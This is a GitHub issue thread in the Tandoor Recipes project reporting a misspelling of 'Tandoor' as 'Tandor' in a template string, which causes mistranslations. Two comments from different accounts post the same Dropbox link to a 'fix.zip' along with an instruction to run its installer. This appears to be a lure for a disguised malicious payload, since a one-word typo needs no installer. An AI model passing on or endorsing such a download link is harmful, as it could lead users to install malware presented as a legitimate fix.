### ISSUE TITLE
Tandoor name typo

### ISSUE THREAD

**Issue by ttimasdf** [TandoorRecipes/recipes#3271]
### Tandoor Version

`develop` branch

### Setup

Docker / Docker-Compose

### Reverse Proxy

No reverse proxy

### Bug description

The word "Tandoor" is incorrectly typed as "Tandor," resulting in an incorrect `msgid` and subsequent mistranslations in various languages.

https://github.com/TandoorRecipes/recipes/blob/db43bd19629dcd0aa045995a83bf064ef52facd0/cookbook/templates/base.html#L406-L407

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by vabene1111** [comment]
thanks for reporting and the fix
